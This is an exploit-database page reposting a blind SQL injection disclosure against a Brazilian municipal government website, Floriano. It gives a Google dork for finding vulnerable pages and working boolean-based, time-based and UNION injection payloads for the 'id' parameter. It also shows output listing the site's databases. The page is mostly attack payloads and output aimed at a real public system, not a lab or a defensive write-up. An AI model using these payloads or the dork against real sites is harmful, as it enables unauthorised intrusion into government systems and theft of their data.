Brazil Floriano Municipality Blind SQL Injection

CVE Category Price Severity
N/A CWE-89 Not specified Critical
Author Risk Exploitation Type Date
Not disclosed High Remote 2021-04-11
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Brazil Floriano Municipality Blind SQL Injection
# Exploit Title: Brazil Government Floriano Municipality Blind SQL Injection Vulnerability
# Author: Emyounoone
# Date: 11/04/2021
# Tested On: Kali Linux
# Contact:
# Google Dork: galeria.php?id=


# Vulnerable Path:

# python3 -u --dbs --batch 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5' AND 1799=1799 AND 'Smtg'='Smtg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=5' AND (SELECT 3577 FROM (SELECT(SLEEP(5)))SVJF) AND 'vUjE'='vUjE

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=5' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767a71,0x687651446f65627a646d636a4c634c6d5541615166766162426563796554436b4f55564553674272,0x717a706a71),NULL-- -
available databases [2]:
[*] floriano_site
[*] information_schema

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.